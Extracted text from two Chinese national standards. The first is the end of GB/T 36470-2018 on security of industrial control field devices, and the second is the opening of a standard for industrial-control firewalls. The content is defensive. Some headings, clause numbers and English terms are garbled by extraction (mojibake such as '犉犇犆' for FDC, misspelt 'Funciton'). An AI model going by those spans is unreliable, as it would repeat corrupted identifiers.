要求 工控系统现场测控设备应具备保护会话完整的机制,以防止中间人攻击。 6 . 4 . 3 . 7 . 2 要求说明 主要针对协议交互过程进行安全设计,防止中间人通过对协议观察分析从而加入或窃取通信会话。 6 . 4 . 3 . 7 . 3 要求加强 无 。 6 . 4 . 3 . 7 . 4 依赖要求 无 。 6 . 5 犉犇犆类:数据保密性 6 . 5 . 1 类描述 对数据的保密性进行保护的目的是防止数据被窃听,主要防护对象是危险的开放环境中传输或存 储的敏感数据。 6 . 5 . 2 犉犇犆_犆犚犕族:加密机制 6 . 5 . 2 . 1 族描述 加密算法的使用、加密设备的采购需符合国家和行业的相关规定。 6 . 5 . 2 . 2 犉犇犆_犆犚犕. 1加密机制 6 . 5 . 2 . 2 . 1 要求 工控系统现场测控设备采用的加密机制应符合国家和行业的相关规定。 6 . 5 . 2 . 2 . 2 要求说明 保证加密机制有效的方法是直接采用国家认证的加密模块。 工控系统现场测控设备应提供所使用 的加密机制的说明文档或第三方的认证报告,用户可以通过这些文档判断所采购的设备是否符合法律、 规章等要求。 犌犅/犜 36470— 2018 6 . 5 . 2 . 2 . 3 要求加强 无 。 6 . 5 . 2 . 2 . 4 依赖要求 无 。 6 . 5 . 3 犉犇犆_犇犛犆族:存储数据保密性 6 . 5 . 3 . 1 族描述 工控系统现场测控设备对存储数据的保密性进行保护,防止未授权的存储数据盗用。 6 . 5 . 3 . 2 犉犇犆_犇犛犆. 1存储数据保密性 6 . 5 . 3 . 2 . 1 要求 工控系统现场测控设备应具备机制保护存储数据的保密性。 6 . 5 . 3 . 2 . 2 要求说明 工控系统现场测控设备中的口令、密钥、用户隐私等敏感数据应以非明文方式存储。 6 . 5 . 3 . 2 . 3 要求加强 FDC_DSC. 1存储数据保密性的要求加强为设备应具备基于密码的存储数据保密性保护机制,如加 密等。 6 . 5 . 3 . 2 . 4 依赖要求 FDC_DSC. 1存储数据保密性的依赖要求是 FDC_CRM. 1 。 6 . 5 . 4 犉犇犆_犇犜犆族:传输数据保密性 6 . 5 . 4 . 1 族描述 工控系统现场测控设备对传输数据的保密性进行保护,防止未授权的通信数据窃听,主要针对口 令、密钥等安全管理数据和重要的系统应用通信数据。 6 . 5 . 4 . 2 犉犇犆_犇犜犆. 1传输数据保密性 6 . 5 . 4 . 2 . 1 要求 工控系统现场测控设备应具备机制保护传输数据的保密性。 6 . 5 . 4 . 2 . 2 要求说明 传输的口令、密钥和用户隐私等敏感数据应以非明文方式传输。 数据保密性保护机制可以在应用 层实现,也可以当数据在非安全域内传输时,在网络层上实现。 6 . 5 . 4 . 2 . 3 要求加强 FDC_DTC. 1传输数据保密性的要求加强为设备应具备基于密码的传输数据保密性保护机制,如 加密等。 6 . 5 . 4 . 2 . 4 依赖要求 FDC_DTC. 1传输数据保密性的依赖要求是 FDC_CRM. 1 。 6 . 6 犉犚犉类:数据流限制 6 . 6 . 1 类描述 数据流限制的目的是在网络与本地通过访问控制和分区限制不必要的数据流。 6 . 6 . 2 犉犚犉_犖犃犆族:网络与端口访问控制 6 . 6 . 2 . 1 族描述 工控系统现场测控设备对网络和本地端口实施访问控制,主要用于保证仅限合法上位机、配置工作 站、其他现场设备或存储介质对设备进行访问。 6 . 6 . 2 . 2 犉犚犉_犖犃犆. 1端口禁用 6 . 6 . 2 . 2 . 1 要求 工控系统现场测控设备应关闭不使用或访问控制范围外通信服务和物理端口。 6 . 6 . 2 . 2 . 2 要求说明 设备上线后通常不需要使用 FTP、HTTP等配置应用,应关闭对应的服务端口,同时也应关闭用于 本地配置的固件升级物理网络端口或串口。 开启的端口和服务均应具备用户鉴别机制。 6 . 6 . 2 . 2 . 3 要求加强 无 。 6 . 6 . 2 . 2 . 4 依赖要求 无 。 6 . 6 . 2 . 3 犉犚犉_犖犃犆. 2数据流控制 6 . 6 . 2 . 3 . 1 要求 工控系统现场测控设备应具备对流入设备数据流的源端访问控制信息进行维护的机制。 6 . 6 . 2 . 3 . 2 要求说明 设备网络层面的访问控制信息包括源IP地址、物理地址、可访问服务及服务中的内容有效性和合 理性,应通过这些内容实现对源端身份合法性的识别。 6 . 6 . 2 . 3 . 3 要求加强 FRF_NAC. 2数据流控制的要求加强为设备应维护公钥、对称密钥等基于密码的设备身份鉴别机 制,以证实通信对端的身份。 6 . 6 . 2 . 3 . 4 依赖要求 FRF_NAC. 2数据流控制的依赖要求是 FIA_IAM. 1 。 6 . 6 . 2 . 4 犉犚犉_犖犃犆. 3无线访问 6 . 6 . 2 . 4 . 1 要求 使用无线访问的工控系统现场测控设备,应能支持在物理上关闭无线功能(如硬压板),且其采用的 无线协议应具备安全机制。 6 . 6 . 2 . 4 . 2 要求说明 关闭设备上的无线访问物理开关后,将不能通过交换机或软件配置开启设备的无线功能。 无线协 议应具备鉴别、完整性保护和加密等安全机制。 6 . 6 . 2 . 4 . 3 要求加强 FRF_NAC. 3无线访问的要求加强为设备应禁用无线通信方式。 6 . 6 . 2 . 4 . 4 依赖要求 无 。 6 . 6 . 2 . 5 犉犚犉_犖犃犆. 4可移动存储介质 6 . 6 . 2 . 5 . 1 要求 工控系统现场测控设备应具备对可移动存储介质(SD卡、U盘等)的使用进行限制的能力。 6 . 6 . 2 . 5 . 2 要求说明 根据授权限制 U盘等可移动存储介质的使用,如禁用自启动、对可移动存储介质传入/传出的代码 和数据类型进行限制。 6 . 6 . 2 . 5 . 3 要求加强 FRF_NAC. 4可移动存储介质的要求加强为设备应禁用可移动存储介质。 6 . 6 . 2 . 5 . 4 依赖要求 无 。 6 . 6 . 3 犉犚犉_犉犝犘族:功能分区 6 . 6 . 3 . 1 族描述 工控系统现场测控设备不同功能的分离通过分区与隔离机制实现。 6 . 6 . 3 . 2 犉犚犉_犉犝犘. 1应用分区 6 . 6 . 3 . 2 . 1 要求 工控系统现场测控设备应将数据获取服务与管理功能分区。 6 . 6 . 3 . 2 . 2 要求说明 应用分区的手段包括使用不同的处理单元、不同的操作系统实例、不同的网络地址、不同的端口或 其他方法。 6 . 6 . 3 . 2 . 3 要求加强 无 。 6 . 6 . 3 . 2 . 4 依赖要求 无 。 6 . 6 . 3 . 3 犉犚犉_犉犝犘. 2安全功能隔离 6 . 6 . 3 . 3 . 1 要求 工控系统现场测控设备应将安全功能与非安全功能隔离,使用的方法如控制安全功能的硬件、软件 和固件的完整性和对它们的访问等。 6 . 6 . 3 . 3 . 2 要求说明 设备应为每个执行进程维护一个独立的执行域(比如地址空间)。 对于一些无法做到该点的老旧工 控设备,应在安全计划中记录该情况并制定风险缓解方法。 6 . 6 . 3 . 3 . 3 要求加强 无 。 6 . 6 . 3 . 3 . 4 依赖要求 无 。 6 . 6 . 3 . 4 犉犚犉_犉犝犘. 3数据的非可执行性 6 . 6 . 3 . 4 . 1 要求 工控系统现场测控设备应将数据和可执行代码分别存储在不同的内存空间,并能够阻止数据内存 空间内的代码执行。 6 . 6 . 3 . 4 . 2 要求说明 可静态分配内存、使用支持硬件 MMU的 OS、或者支持分离内存硬件设计的 CPU。 6 . 6 . 3 . 4 . 3 要求加强 无 。 6 . 6 . 3 . 4 . 4 依赖要求 无 。 6 . 7 犉犚犃类:资源可用性 6 . 7 . 1 类描述 资源可用性的目的是确保设备灵活应对不同类型的拒绝服务事件,并保持设备在紧急情况下能够 保持业务连续性。 6 . 7 . 2 犉犚犃_犇犛犘族:拒绝服务保护 6 . 7 . 2 . 1 族描述 工控系统现场测控设备抵御 DoS攻击或降低攻击的影响,保障重要服务。 在实际防护中还要综合 考虑网络上的隔离手段,例如在网络边界设备上降低 DoS攻击成功的可能性。 6 . 7 . 2 . 2 犉犚犃_犇犛犘. 1数据洪泛保护 6 . 7 . 2 . 2 . 1 要求 工控系统现场测控设备应能够抵御一定的数据洪泛攻击或降低攻击的影响,保证重要业务功能的 通信。 6 . 7 . 2 . 2 . 2 要求说明 常用的抵御洪泛攻击或限制其影响的机制包括:现场设备在遭遇洪泛攻击时,以降级模式(限速)运 行直至攻击结束;在网络边界上使用数据包过滤设备。 6 . 7 . 2 . 2 . 3 要求加强 无 。 6 . 7 . 2 . 2 . 4 依赖要求 无 。 6 . 7 . 3 犉犚犃_犅犝犆族:业务连续性 6 . 7 . 3 . 1 族描述 工控系统现场测控设备应具备业务连续性保护机制。 6 . 7 . 3 . 2 犉犚犃_犅犝犆. 1关键服务连续性 6 . 7 . 3 . 2 . 1 要求 工控系统现场测控设备即使发生一般故障也能保证主要的业务功能。 6 . 7 . 3 . 2 . 2 要求说明 设备应在出现一般故障(软件错误、缓冲区溢出、数据洪泛等)或中断时提供自动保护功能,当故障 发生时自动保护重要状态信息和进程,保证设备能够进行恢复。 典型的机制如看门狗进程。 6 . 7 . 3 . 2 . 3 要求加强 FRA_BUC. 1关键服务连续性的要求加强为设备应具备一般故障或中断通知报警功能。 6 . 7 . 3 . 2 . 4 依赖要求 FRA_BUC. 1关键服务连续性的依赖要求是 FUC_ATC. 1 。 6 . 7 . 3 . 3 犉犚犃_犅犝犆. 2协议模糊攻击保护 6 . 7 . 3 . 3 . 1 要求 工控系统现场测控设备应能够容忍针对通信协议的模糊攻击。 6 . 7 . 3 . 3 . 2 要求说明 协议模糊攻击的防护主要依靠设备所开启服务在开发实现过程中的安全水平。 6 . 7 . 3 . 3 . 3 要求加强 无 。 6 . 7 . 3 . 3 . 4 依赖要求 无 。 6 . 7 . 3 . 4 犉犚犃_犅犝犆. 3数据备份 6 . 7 . 3 . 4 . 1 要求 工控系统现场测控设备应直接或依靠其他工具提供备份功能,进行应用级和系统级信息(包括系统 安全状态信息)的备份。 6 . 7 . 3 . 4 . 2 要求说明 备份的功能和方法应在用户手册中说明。 6 . 7 . 3 . 4 . 3 要求加强 FRA_BUC. 3数据备份的要求加强为设备应能够验证备份机制的可靠性和备份信息的完整性。 6 . 7 . 3 . 4 . 4 依赖要求 无 。 6 . 7 . 3 . 5 犉犚犃_犅犝犆. 4设备恢复 6 . 7 . 3 . 5 . 1 要求 工控系统现场测控设备应具备在中断或故障后,恢复和重构到已知安全状态的能力。 6 . 7 . 3 . 5 . 2 要求说明 工控系统现场测控设备应提供恢复功能,即能够恢复到预先定义的安全状态,或在中断或故障后由 用户恢复并重组先前保存的备份。 预先定义的状态包括: — 未上电状态; — 可知的最后的好值; — 由资产属主或应用确定的固定值。 6 . 7 . 3 . 5 . 3 要求加强 无 。 6 . 7 . 3 . 5 . 4 依赖要求 无 。 6 . 7 . 3 . 6 . 5备用电源 6 . 7 . 3 . 6 . 1 要求 工控系统现场测控设备或附属组件应支持在不影响业务运行情况下的备用电源切换。 6 . 7 . 3 . 6 . 2 要求说明 无 。 6.7.3.6.3 无 。 6.7.3.6.4 无 。 工业控制系统现场测控设备典型功能 工业控制系统现场测控设备位于工业控制系统的最底层,直接与生产过程设备连接,实现对现场的 测量与控制,如图 A.1 所示。现场设备具备的典型功能包括:通过现场总线与生产过程上的传感器、调 节器、变送器、开关或I/O 单元进行通信;进行控制逻辑运算;通过本地或远程以太网上传数据给实时 数据库服务器及操作员站,接受本地与中心操作员站的控制命令,完成控制参数调整与输出调整,接受 工程师站的控制方案更改、调试等操作;系统启动、诊断、掉电数据保持等。 工业控制系统现场测控设备典型硬件结构 在硬件组成上,数字化的尤其是使用嵌入式软件的工业控制系统现场测控设备通常由微处理器、存 储器、输入/输出模块、通信模块、电源、人机接口以及管理模块等部分组成。根据设备的用途和先进程 度的不同,设备的硬件组成不完全相同,并不是所有现场设备都具备以上提到所有的模块。 微处理器进行设备内部逻辑控制与计算,具体功能包括采集输入接口的所有数据、执行用户程序、 输出控制指令到输出接口并发送或接收通信数据至通信接口。作为系统核心的微处理器包括 MCU 和 MPU 存储器包括有系统程序存储器、用户程序存储器和数据存储器。具体存储介质包括 RAM、 Flash 等。 电源模块实现设备自身的供电。 总线协议处理模块实现对现场总线协议的处理和接口,但它物理上一般并不是独立的硬件模块,而 是和处理器在一个模块内。 通信模块实现设备的通信连接。随着总线技术以及网络技术在工业控制系统中的标准化和应用, 目前很多嵌入式现场设备都通过以太网实现现场数据采集与控制。即采用不同的网络协议处理与接口 模块取代原有的输入和输出模块。 输入模块接收电压、电流、温度、压力等现场测量量,可分为模拟输入模块和数字输入模块。 输出模块输入对开关、调节器等设备的控制信号。 人机接口(MMI) 一般固定在装置前面板上,有液晶显示屏、参数设置键和就地功能按钮。可以显 示当前的测量值、配置信息等。 管理模块实现装置的管理和通信。具体功能包括实现与人机接口面板、调试软件、监控后台、工程 师站、远动和打印机间的通信。 设备的对外物理接口形式包括有 IEEE802.3 以太网口、电缆接口、RS232 串口、RS485 串口、 ISO 11898 串 口 等 。 A.3 工业控制系统现场测控设备典型软件结构 目前工业控制系统现场测控设备的软件架构都是基于嵌入式软件。 嵌入式系统的发展主要经历了三个阶段。无操作系统的嵌入式系统的出现最初是基于单片机,这 类嵌入式系统具有与一些监测、伺服和指示设备相配合的功能。它无操作系统支持,而是通过汇编语言 编程对系统进行直接控制,此外,它系统结构和功能相对单一,针对性强,几乎没有用户接口。简单监控 式的实时操作系统主要以嵌入式处理器为基础,以简单监控式系统为核心。系统的优点是处理器种类 繁多,开销小,效率高一般配备系统仿真器,具有一定的兼容性和扩展性。但是此时的系统通信性较差, 用户界面不够友好,主要用来控制系统负载以及监控系统应用程序运行。随着对实时性要求的提高和 软件规模不断扩大,实时多任务操作系统(RTOS) 成为目前国际嵌入式系统的主流,包括 VxWorks 、 Windows CE、Linux 等 ,VxWorks 以其强实时性、高性能的内核和良好的开发界面成为了嵌入式实时 操作系统领域的杰出代表。当前嵌入式系统的特点是能运行在各种不同的微处理器上,具有强大的通 用型操作系统功能,包括多任务、设备驱动支持、网络支持、图形窗口、用户界面以及文件和目录管理等 功能,具有丰富的 API 和嵌入式应用软件。 用户标识与鉴别 FIA类 FunctionIdentificationandAuthentication 使用控制 FUC类 FunctionUseControl 数据完整性 FDI类 FunctionDataIntegrity 数据保密性 FDC类 FunctionDataConfidentiality 受限的信息流 FRF类 FunctionRestrictDataFlow 资源可用性 FRA类 FunctionResourceAvailability FIA_IAM族 标识与鉴别方式 FuncitonIdentification and Authentication _ Identification and AuthenticationMethods FIA_IDM族 标识符管理 FuncitonIdentificationand Authentication__Identities Manage ment FIA_ACM族 鉴别凭证管理 FuncitonIdentificationand Authentication_ AuthenticationCre dentialManagement FIA_LGM族 登录管理 FuncitonIdentificationandAuthentication_LoginManagement FUC_ACA族 访问控制授权 FuncitonUseControl__AccessControlAuthorization FUC_SEC族 会话控制 FuncitonUseControl__SessionControl FUC_ATC族 审计踪迹产生 FuncitonUseControl_CreationofAuditTrail FUC_ATS族 审计踪迹存储 FuncitonUseControl_StorageofAuditTrail FUC_ATR族 审计踪迹访问 FuncitonUseControl_ReportofAuditTrail FDI_DSI族 数据存储完整性 FuncitonDataIntegrity_IntegrityofStoredData FDI_DTI族 数据传输完整性 FuncitonDataIntegrity_IntegrityofTransmittedData FDC_CRM族 加密机制 FuncitonDataConfidentiality_CryptographicMechanisms FDC_DSC族 存储数据保密性 FuncitonDataConfidentiality_ConfidentialityofStoredData FDC_DTC族 传输数据保密性 FuncitonDataConfidentiality_ConfidentialityofTransmitted Data FRF_FUP族 功能分区 FuncitonRestrictDataFlow_FunctionPartitioning FRA_DSP族 拒绝服务保护 FuncitonResourceAvailability_DenyofSevicesProtection FRA_BUC族 业务连续性 FuncitonResourceAvailability_BusinessContinuity
standards
信息安全技术 工业控制系统专用 防火墙技术要求 Information security technology—Technical requirements of industrial control system dedicated firewall 随着工业化与信息化的深度融合,来自信息网络的安全威胁正逐步对工业控制系统造成极大的安 全威胁,通用防火墙在面对工业控制系统的安全防护时显得力不从心,因此急需要一种能应用于工业控 制环境的防火墙对工业控制系统进行安全防护。 应用于工业控制环境的防火墙与通用防火墙的主要差异体现在: ——通用防火墙除了需具备基本的五元组过滤外,还需要具备一定的应用层过滤防护能力。用于 工业控制环境的防火墙除了具有通用防火墙的部分通用协议应用层过滤能力外,还具有对工 业控制协议应用层的过滤能力。 ——用于工业控制环境的防火墙比通用防火墙具有更高的环境适应能力。 ——工业控制环境中,通常流量相对较小,但对控制命令的执行要求具有实时性。因此,工业控制 防火墙的吞吐量性能要求可相对低一些,而对实时性要求较高。 ——工业控制环境下的防火墙比通用防火墙具有更高的可靠性、稳定性等要求。 信息安全技术 工业控制系统专用 防火墙技术要求 1 范围 本标准规定了工业控制系统专用防火墙(以下简称工控防火墙)的安全功能要求、自身安全要求、性 能要求和安全保障要求。 本标准适用于工控防火墙的设计、开发和测试。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 2423.5—1995 电工电子产品环境试验 第2部分:试验方法 试验 Ea 和导则:冲击 GB/T 2423.8—1995 电工电子产品环境试验 第2部分:试验方法 试验 Ed: 自由跌落 GB/T2423.10—2008 电工电子产品环境试验 第2部分:试验方法 试验 Fc: 振动(正弦) GB/T 4208—2017 外壳防护等级(IP 代码) GB4824—2013 工业、科学和医疗(ISM) 射频设备 骚扰特性 限值和测量方法 GB/T 9254—2008 信息技术设备的无线电骚扰限值和测量方法 GB/T 13729—2002 远动终端设备 GB/T 15153.1—1998 远动设备及系统 第2部分:工作条件 第1篇:电源和电磁兼容性 GB/T 17214.4—2005 工业过程测量和控制装置的工作条件 第4部分:腐蚀和侵蚀影响 GB/T 17626.2—2018 电磁兼容 试验和测量技术 静电放电抗扰度试验 GB/T 17626.3—2016 电磁兼容 试验和测量技术 射频电磁场辐射抗扰度试验 GB/T 17626.4—2018 电磁兼容 试验和测量技术 电快速瞬变脉冲群抗扰度试验 GB/T 17626.5—2008 电磁兼容 试验和测量技术 浪涌(冲击)抗扰度试验 GB/T 17626.6—2017 电磁兼容 试验和测量技术 射频场感应的传导骚扰抗扰度 GB/T 17626.8—2006 电磁兼容 试验和测量技术 工频磁场抗扰度试验 GB/T 17626.10—2017 电磁兼容 试验和测量技术 阻尼振荡磁场抗扰度试验 GB/T 17626.11—2008 电磁兼容 试验和测量技术 电压暂降、短时中断和电压变化的抗扰度 试验 GB/T 17626.12—2013 电磁兼容 试验和测量技术 振铃波抗扰度试验 GB/T 17626.16—2007 电磁兼容 试验和测量技术 0 Hz~150 kHz 共模传导骚扰抗扰度试验 GB/T 17626.17—2005 电磁兼容 试验和测量技术 直流电源输入端口纹波抗扰度试验 GB/T 17626.18—2016 电磁兼容 试验和测量技术 阻尼振荡波抗扰度试验 GB/T 17626.29—2006 电磁兼容 试验和测量技术 直流电源输入端口电压暂降、短时中断和 电压变化的抗扰度试验 GB/T 20281—2015 信息安全技术 防火墙安全技术要求和测试评价方法 GB/T 20438.3—2017 电气/电子/可编程电子安全相关系统的功能安全 第3部分:软件要求 GB/T 20438.4—2017 电气/电子/可编程电子安全相关系统的功能安全 第4部分:定义和缩 略语 GB/T 25069—2010 信息安全技术 术语 GB/T 32919—2016 信息安全技术 工业控制系统安全控制应用指南 3 术语和定义 GB/T 20281—2015、GB/T 20438.4-2017、GB/T 25069-2010 和 GB/T 32919—2016 界定的以及 下列术语和定义适用于本文件。 3.1 工业控制协议 industrial control protocol 工业控制系统中,上位机与控制设备之间以及控制设备与控制设备之间的通信报文规约。通常包 括模拟量和数字量的读写控制。 3.2 工业控制系统专用防火墙 industrial control system dedicated firewall 部署于工业控制系统中不同的安全域之间,或者控制器之前,具备网络层访问控制及过滤功能,工 业控制协议规约检查和过滤功能,并具备高可用性,能够适用于工业控制环境的安全网关类产品。 4 缩略语 下列缩略语适用于本文件。 DMZ: 非军事区(Demilitarized Zone) DNAT: 目的地址转换(Destination Network Address Translation) ICMP: 网络控制报文协议(Internet Control Message Protocol) MAC: 介质访问控制(Media Access Control) NAT: 网络地址转换(Network Address Translation) OPC: 用于过程控制的对象链接与嵌入(Object Linking and Embedding for Process Control) SNAT: 源地址转换(Source Network Address Translation) SNMP: 简单网络管理协议(Simple Network Management Protocol) SYN: 同步序列编号(Synchronize Sequence Numbers) UDP: 用户数据报协议(User Datagram Protocol) 5 产品描述 工控防火墙是应用于工业控制系统的一类特殊防火墙,其既要满足通用防火墙的基本要求,还要满 足工业控制环境下的特殊要求,工控防火墙主要应用在工业控制层级间防护以及各层区域间防护。 6 安全技术要求 6.1 基本级安全技术要求 6.1.1 安全功能要求 6.1.1.1 网络层控制 6.1.1.1.1 包过滤 工控防火墙的包过滤要求如下: a) 安全策略应使用默认禁止原则,即除非明确允许,否则就禁止; b) 安全策略应包含基于源 IP 地址、目的 IP 地址的访问控制; c) 安全策略应包含基于源端口、目的端口的访问控制; d) 安全策略应包含基于协议类型的访问控制; e) 安全策略应包含基于 MAC 地址的访问控制; f) 应支持用户自定义的安全策略,安全策略可以是MAC 地址、IP 地址、端口的部分或全部组合。 6.1.1.1.2 NAT 部署域间的工控防火墙应具备 NAT 功能,具体技术要求如下: a) 应支持双向NAT:SNAT 和 DNAT; b) SNAT 应至少可实现“多对一”地址转换,使得内部网络主机访问外部网络时,其源 IP 地址被 转换。 6.1.1.1.3 状态检测 工控防火墙应具备状态检测功能,支持基于状态检测技术的访问控制。 6.1.1.1.4 动态开放端口 工控防火墙应具备动态开放端口功能,应至少支持 OPC 、FTP协议。 6.1.1.1.5 IP/MAC 地址绑定 工控防火墙应支持自动或手动绑定 IP/MAC 地址;应能够检测 IP 地址盗用事件,拦截盗用IP 地 址的主机经过工控防火墙的各种访问。 6.1.1.1.6 抗拒绝服务攻击 工控防火墙应具有抗拒绝服务攻击的能力,具体技术要求如下(包括,但不限于): a) ICMP Flood 攻击; b) UDP Flood 攻击; c) SYN Flood 攻击; d) TearDrop 攻击; e) Land 攻击; f) 超大ICMP 数据攻击。 6.1.1.1.7 网络扫描防护 工控防火墙应能够检测和记录扫描行为,包括对受保护网络的扫描。 6.1.1.2 应用层控制 6.1.1.2.1 应用协议控制 工控防火墙应能识别并控制各种应用类型,具体技术要求如下: a) 支持 HTTP 、FTP 、Telnet 等通用应用层协议; b) 支持常用工业控制协议,如 OPC 、Modbus TCP 、Profinet 、BACnet 、DNP3 、IEC104 等 。 6.1.1.2.2 工业协议深度内容检测 工控防火墙应能对主流工业协议进行深度内容检测,具体技术要求如下: a) 工控协议格式规约检查,禁止不符合协议规约的通信; b) 对工业协议的操作类型、操作对象、操作范围等参数进行控制; c) 至少支持一种主流工控协议。 注:具体工控协议检测深度参见附录C。 6.1.2 自身安全要求 6.1.2.1 运维管理 6.1.2.1.1 管理安全 工控防火墙应具备管理安全功能,具体技术要求如下: a) 支持对授权管理员的口令鉴别方式,且口令设置满足安全要求; b) 应在所有授权管理员请求执行任何操作之前,对每个授权管理员进行唯一的身份鉴别; c) 应具有登录失败处理功能,身份鉴别在经过一个可设定的鉴别失败最大次数后,工控防火墙应 终止管理主机或用户建立的会话; d) 工控防火墙应为每一位规定的授权管理员提供一套唯一的为执行安全策略所必需的安全 属性。 6.1.2.1.2 管理方式 工控防火墙应具备多种管理方式,具体技术要求如下: a) 应支持进行本地管理工控防火墙; b) 应支持通过网络接口进行远程管理,并可限定可进行远程管理的网络接口; c) 远程管理过程中,管理端与工控防火墙之间的所有通信数据应加密传输。 6.1.2.1.3 管理能力 工控防火墙应具备相应的管理能力,具体技术要求如下: a) 向授权管理员提供设置和修改安全管理相关的数据参数的功能; b) 向授权管理员提供设置、查询和修改各种安全策略的功能; c) 向授权管理员提供管理审计日志的功能。 6.1.2.2 安全审计 6.1.2.2.1 记录事件类型 工控防火墙应具备安全审计功能,记录事件类型要求如下: a) 工控防火墙访问控制策略匹配的访问请求; b) 访问控制策略默认禁止的访问请求,包括试图穿越或到达工控防火墙的访问请求; c) 检测到的攻击行为; d) 试图登录工控防火墙管理端口和管理身份鉴别请求; e) 对工控防火墙系统重要管理配置操作,如增加/删除/修改管理员、保存/删除审计日志、更改安 全策略和配置参数等; f) 其他应记录的事件类型。 6.1.2.2.2 日志内容 工控防火墙应具备安全审计功能,日志内容要求如下: a) 事件发生的日期时间,日期应包括年、月、日,时间应包括时、分、秒; b) 访问控制日志应包括数据包的协议类型、源地址、目标地址、源端口、目标端口,允许或禁止; c) 工控协议的深度内容检查信息; d) 管理日志应包括事件主体、事件客体、事件描述。 6.1.2.2.3 日志管理 工控防火墙应具备日志管理功能,具体技术要求如下: a) 应只允许授权审计员对日志进行读取、存档、导出、删除和清空等操作; b) 应提供日志查阅工具,具备对审计事件以时间、日期、主体标识、客体标识等条件检索的能力, 并且只允许授权审计员使用查阅工具; c) 审计事件应存储于掉电非易失性存储介质中,且在存储空间达到阈值时通知授权管理员进行 处理。 6.1.2.3 安全管理 6.1.2.3.1 安全支撑系统 工控防火墙的底层支撑系统应满足以下要求: a) 不提供多余的网络服务; b) 不含任何导致产品权限丢失、拒绝服务等的安全漏洞。 6.1.2.3.2 异常处理机制 工控防火墙在非正常关机(比如掉电、强行关机)再重新启动后,应满足如下技术要求: a) 安全策略恢复到关机前的状态; b) 日志信息不会丢失; c) 管理员重新鉴别。 6.1.2.4 高可用性 6.1.2.4.1 可用性保障 部署在现场控制层的工控防火墙应具备 Bypass 功能,当工控防火墙自身出现断电故障时,应使工 控防火墙内部接口与外部接口直接物理连通,保持内部网络与外部网络之间的正常通信,并及时告警。 6.1.2.4.2 设备自检 工控防火墙应具备一定的自检功能: a) 在初始化或启动期间,应能对设备硬件、程序或功能模块、重要配置文件等进行检测,当发现异 常时能够及时告警; b) 在运行期间,应能在授权管理员的要求下或者周期性的对提供安全功能的模块或进程进行检 测,当出现异常时能够及时告警。 6.1.2.4.3 运行模式 工控防火墙应支持多种运行模式,工控防火墙能够区分部署过程和工作过程,以实现对被防护系统 的最小影响,具体技术要求如下: a) 支持学习模式,工控防火墙记录运行过程中经过防火墙的所有策略、资产等信息,形成白名单 策略集; b) 支持验证模式或测试模式,该模式下工控防火墙对禁止策略进行告警,但不拦截; c) 支持正常工作模式,工控防火墙的正常工作模式,严格按照防护策略进行过滤等动作保护。 6.1.2.4.4 安全策略更新 工控防火墙安全策略应用时不应影响正常的数据通信。 6.1.2.4.5 时间同步 工控防火墙应支持与时钟服务器自动同步时间的功能。 6.1.2.4.6 电源冗余 部署现场控制层的工控防火墙应提供双电源冗余功能。 6.1.2.4.7 散热方式 部署现场控制层的工控防火墙应采用自然散热,无风扇方式设计。 6.1.3 性能要求 6.1.3.1 吞吐量 工控防火墙在只有一条允许规则和不丢包的情况下, 一对相应速率的端口应达到的双向吞吐量指 标如下: a) 部署在域间的工控防火墙: 1) 对64字节短包,百兆工控防火墙应不小于线速的30%,千兆工控防火墙应不小于线速 的 4 0 % ; 2) 对256字节中长包,百兆工控防火墙应不小于线速的70%,千兆工控防火墙应不小于线 速的80%; 3) 对512字节长包,百兆工控防火墙应不小于线速的90%,千兆工控防火墙应不小于线速 的 9 5 % 。 b) 部署在现场控制层设备前的工控防火墙: 1) 对64字节短包,百兆工控防火墙应不小于线速的10%,千兆工控防火墙应不小于线速 的 2 0 % ; 2) 对256字节中长包,百兆工控防火墙应不小于线速的30%,千兆工控防火墙应不小于线 速的40%; 3) 对512字节长包,百兆工控防火墙应不小于线速的50%,千兆工控防火墙应不小于线速 的 7 0 % 。 6.1.3.2 延迟 延迟视不同速率的工控防火墙有所不同,在吞吐量90%条件下,应满足如下要求: a) 部署在域间的工控防火墙: 1) 对64字节短包、256字节中长包、512字节长包,百兆工控防火墙平均延迟不应超过 1 ms; 2) 对64 字节短包、256 字节中长包、512 字节长包,千兆工控防火墙平均延迟不应超过 200 μs₄ b) 部署在现场控制层设备前的工控防火墙: 1) 对64字节短包、256字节中长包、512字节长包,百兆工控防火墙平均延迟不应超过 500 μs; 2) 对64字节短包、256字节中长包、512字节长包,千兆工控防火墙平均延迟不应超过 200 μs. 6.1.3.3 最大并发连接数 最大并发连接数视不同速率的工控防火墙有所不同,具体指标要求如下: a) 百兆工控防火墙的最大并发连接数应不小于60000个; b) 千兆工控防火墙的最大并发连接数应不小于300000个。 6.1.3.4 最大连接速率 最大连接速率视不同速率的工控防火墙有所不同,具体指标要求如下: a) 百兆工控防火墙的最大连接速率应不小于1500个/s; b) 千兆工控防火墙的最大连接速率应不小于5000个/s。 6.1.4 安全保障要求 6.1.4.1 开发 6.1.4.1.1 安全架构 开发者应提供产品安全功能的安全架构描述,技术要求如下: a) 与产品设计文档中对安全功能的描述一致; b) 描述与安全功能要求一致的安全域; c) 描述产品安全功能初始化过程及安全措施; d) 证实产品安全功能能够防止被破坏; e) 证实产品安全功能能够防止安全策略被旁路。 6.1.4.1.2 功能规范 开发者应提供完备的功能规范说明,技术要求如下: a) 完整描述产品的安全功能; b) 描述所有安全功能接口的目的与使用方法; c) 标识和描述每个安全功能接口相关的所有参数; d) 描述安全功能接口相关的安全功能实施行为; e) 描述由安全功能实施行为而引起的直接错误消息; f) 证实安全功能要求到安全功能接口的追溯。 6.1.4.1.3 产品设计 开发者应提供产品设计文档,技术要求如下: a) 根据子系统描述产品结构,并标识和描述产品安全功能的所有子系统; b) 描述安全功能所有子系统间的相互作用; c) 提供的映射关系能够证实设计中描述的所有行为能够映射到调用它的安全功能接口。 6.1.4.2 指导性文档 6.1.4.2.1 操作用户指南 开发者应提供明确和合理的操作用户指南,操作用户指南与为评估而提供的其他所有文档保持一 致,对每一种用户角色的描述要求如下: a) 描述授权用户可访问的功能和特权,包含适当的警示信息; b) 描述如何以安全的方式使用产品提供的接口; c) 描述可用功能和接口,尤其是受用户控制的所有安全参数,适当时指明安全值; d) 明确说明与需要执行的用户可访问功能有关的每一种安全相关事件,包括改变安全功能所控 制实体的安全特性; e) 标识产品运行的所有可能状态(包括操作导致的失败或者操作性错误),以及它们与维持安全 运行之间的因果关系和联系; f) 实现安全目的所应执行的安全策略。 6.1.4.2.2 准备程序 